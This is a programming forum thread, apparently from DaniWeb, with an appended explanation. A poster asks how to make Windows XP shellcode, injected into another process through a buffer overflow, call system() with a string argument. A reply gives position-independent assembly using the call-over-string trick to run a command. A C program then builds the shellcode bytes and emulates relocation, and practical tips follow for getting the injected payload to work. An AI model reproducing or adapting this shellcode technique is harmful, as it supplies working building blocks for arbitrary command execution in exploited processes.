I would like to know what is wrong with this code:

[BITS 32] ; Windows XP SP2 32-bit

section .text

global _main

  _main:
     push Command
     mov eax, 0xAABBCCDD ; address of system()
     call eax

  Command:
     db "echo whatever"

As you allude to WinXP, I'll assume you are doing a Windows application and as such you must include kernel32.lib and call one of the text-emitting functions DrawText, TextOut or ExtTextOut. For example, DrawText requires 5 parameters as follows:

1. Your program's window device context
2. Long pointer to string (in your case Command)
3. Length of string
4. Pointer to bounding rectangle (see the RECT structure)
5. Flags: how you want the text to be displayed within the defined rectangle.

No...

This is for Windows shellcode. This will be injected into another application that has already included everything. I already made shellcode that just calls MessageBox(0,0,0,0) and it works.

So are you basically telling me that I need to push a long pointer of a string onto the stack and use that as the argument?

Also, I'm not doing this for a purpose other than for work.

You've got the idea. The only thing your application has to do is get the Device Context of the window you want the text to appear on and then, dependent upon the API function you want to use, push the appropriate parameters on the stack and call the function.

Like the example I gave you in the previous message, DrawText requires 5 parameters.

Post the code you're going to use in its entirety and I should be able to help you further from there.

No, that IS the entire piece of code I'm using...just substitute 0xAABBCCDD for the actual address of system(). You said "push the appropriate parameters" - that's what I'm asking. How do I do that when the parameter is a string? Push only pushes 4 bytes....

Elaborate specifically what string you want to send to which application and then I might get a better understanding what you mean by shell code.

Ha? Shellcode is executed by overflowing a buffer and overwriting the EIP with a JMP %ESP instruction. It then jumps to the ESP and executes the shellcode.

But this is all irrelevant. All I want to know is how I accomplish calling that function by passing a string off as the parameter.

The "echo" command is implemented by "CMD.EXE" [ "COMMAND.EXE" on Win95/98 ] so you will have to launch "CMD.EXE" by starting another process. You can use either ShellExecute or CreateProcess to do this. You will want to change your string to "cmd.exe echo whatever" or you could also use "start cmd.exe echo whatever". Here is Microsoft documentation:

ShellExecute
http://msdn2.microsoft.com/en-us/library/ms647732.aspx

CreateProcess
http://msdn2.microsoft.com/en-US/library/ms682425.aspx

Nathan.

As you allude to WinXP, I'll assume you are doing a Windows application and as such you must include kernel32.lib and call one of the text-emitting functions DrawText, TextOut or ExtTextOut. For example, DrawText requires 5 parameters as follows:

1. Your program's window device context
2. Long pointer to string (in your case Command)
3. Length of string
4. Pointer to bounding rectangle (see the RECT structure)
5. Flags: how you want the text to be displayed within the defined rectangle.

That's the procedure for displaying "text" in a window. Heck, it is even simpler than that -- just call MessageBox. Sadly, this was not the original poster's question.

Nathan.

Alright, alright, alright... I contacted a friend of mine who was actually able to answer my question. This is what he said:

You almost have it:

section .text
global _main

  _main:
     ; "save the return address to the stack": call pushes the address
     ; of the byte right after itself, which is the start of the string,
     ; so the stack now holds the string's real run-time address
     ; no matter where this code has been copied to
     call GetCommand
     db "notepad.exe"
     db 0                 ; NUL terminator, system() needs it

  GetCommand:
     ; the command address is now the top thing on the stack,
     ; i.e. it is already in place as the one argument to system()
     mov eax, 0xAABBCCDD  ; address of system() in the target process
     call eax

The difference was your method was pushing the relative offset to the
string, where my version was pushing the actual address of the string.
Glad I could help.
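To make the difference between the two listings concrete, here is an added C example. It is not from the thread or from DaniWeb: it encodes both listings as raw x86 bytes (the call variant above and the original push variant) and emulates only the first instruction of each, to show what value ends up on the stack as system()'s argument when the bytes are copied somewhere other than where they were assembled. Nothing is executed, so it runs on any platform. The system() address 0xAABBCCDD and the link/load addresses 0x00401000 and 0x0012FF80 are placeholders, as in the thread; "notepad.exe" and "echo whatever" are the thread's own strings.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* x86 opcodes for the instructions used in both listings. */
#define OP_CALL_REL32   0xE8   /* call rel32       */
#define OP_PUSH_IMM32   0x68   /* push imm32       */
#define OP_MOV_EAX_IMM  0xB8   /* mov eax, imm32   */
#define OP_CALL_EAX_0   0xFF   /* call eax = FF D0 */
#define OP_CALL_EAX_1   0xD0

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Corrected listing: call GetCommand / db "cmd",0 / mov eax,sys / call eax.
 * rel32 is just the string length plus its NUL, so the call lands on the
 * mov and leaves the string's run-time address on the stack.
 * Returns bytes written, or 0 if cap is too small. */
size_t build_call_string_shellcode(uint8_t *out, size_t cap,
                                   const char *cmd, uint32_t system_addr)
{
    size_t slen = strlen(cmd) + 1;            /* system() needs the NUL */
    size_t total = 5 + slen + 5 + 2;
    if (total > cap) return 0;
    out[0] = OP_CALL_REL32;  put_le32(out + 1, (uint32_t)slen);
    memcpy(out + 5, cmd, slen);
    out[5 + slen] = OP_MOV_EAX_IMM;  put_le32(out + 6 + slen, system_addr);
    out[10 + slen] = OP_CALL_EAX_0;  out[11 + slen] = OP_CALL_EAX_1;
    return total;
}

/* Original listing as the assembler/linker would emit it for a module placed
 * at link_addr: push imm32 / mov eax,sys / call eax / db "cmd" (no NUL, as
 * posted). imm32 is Command's link-time address, 12 bytes past the start. */
size_t build_push_imm32_shellcode(uint8_t *out, size_t cap, const char *cmd,
                                  uint32_t system_addr, uint32_t link_addr)
{
    size_t slen = strlen(cmd);
    size_t total = 5 + 5 + 2 + slen;
    if (total > cap) return 0;
    out[0] = OP_PUSH_IMM32;  put_le32(out + 1, link_addr + 12);
    out[5] = OP_MOV_EAX_IMM; put_le32(out + 6, system_addr);
    out[10] = OP_CALL_EAX_0; out[11] = OP_CALL_EAX_1;
    memcpy(out + 12, cmd, slen);
    return total;
}

/* Emulate the first instruction of `code` once it sits at load_addr and
 * report what it pushes: for call rel32 the return address (load_addr + 5),
 * for push imm32 the baked-in immediate. Returns 0, or -1 for other opcodes. */
int emulate_first_push(uint32_t load_addr, const uint8_t *code, uint32_t *pushed)
{
    switch (code[0]) {
    case OP_CALL_REL32: *pushed = load_addr + 5;        return 0;
    case OP_PUSH_IMM32: *pushed = get_le32(code + 1);   return 0;
    default:            return -1;
    }
}

/* Does the pushed value point at cmd inside the copy living at load_addr? */
int pushed_points_at_cmd(const uint8_t *code, size_t len, uint32_t load_addr,
                         uint32_t pushed, const char *cmd)
{
    size_t clen = strlen(cmd);
    if (pushed < load_addr || (size_t)(pushed - load_addr) + clen > len) return 0;
    return memcmp(code + (pushed - load_addr), cmd, clen) == 0;
}

/* Corrected listing relocated to load_addr: 1 if the argument still reaches
 * the string and the call lands on the mov eax, 0 otherwise. */
int call_variant_works_at(const char *cmd, uint32_t load_addr)
{
    uint8_t code[96]; uint32_t pushed;
    size_t n = build_call_string_shellcode(code, sizeof code, cmd, 0xAABBCCDD);
    if (n == 0 || emulate_first_push(load_addr, code, &pushed) != 0) return 0;
    uint32_t target_off = 5 + get_le32(code + 1);   /* rel32 is relative to load_addr + 5 */
    if (target_off >= n || code[target_off] != OP_MOV_EAX_IMM) return 0;
    return pushed_points_at_cmd(code, n, load_addr, pushed, cmd);
}

/* Original listing linked for link_addr but run from load_addr. */
int push_variant_works_at(const char *cmd, uint32_t link_addr, uint32_t load_addr)
{
    uint8_t code[96]; uint32_t pushed;
    size_t n = build_push_imm32_shellcode(code, sizeof code, cmd, 0xAABBCCDD, link_addr);
    if (n == 0 || emulate_first_push(load_addr, code, &pushed) != 0) return 0;
    return pushed_points_at_cmd(code, n, load_addr, pushed, cmd);
}

int main(void)
{
    uint8_t code[96];
    size_t n = build_call_string_shellcode(code, sizeof code, "notepad.exe", 0xAABBCCDD);
    for (size_t i = 0; i < n; i++) printf("%02X%c", code[i], i + 1 == n ? '\n' : ' ');
    printf("call variant at 0x00401000: %d, at 0x0012FF80: %d\n",
           call_variant_works_at("notepad.exe", 0x00401000),
           call_variant_works_at("notepad.exe", 0x0012FF80));
    printf("push variant linked at 0x00401000, run at 0x00401000: %d, at 0x0012FF80: %d\n",
           push_variant_works_at("echo whatever", 0x00401000, 0x00401000),
           push_variant_works_at("echo whatever", 0x00401000, 0x0012FF80));
    return 0;
}
```

The push variant only works when the bytes happen to land at the exact address the linker assumed, which injected shellcode never gets; the call variant carries no address at all, only a relative skip over the string, so it works at any load address. Two things the emulation does not cover still have to be right in practice: the string must be NUL-terminated (the original "echo whatever" was not), and 0xAABBCCDD has to be replaced by the address of system() inside the process the code is injected into, not the address in whatever program you assembled it with.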
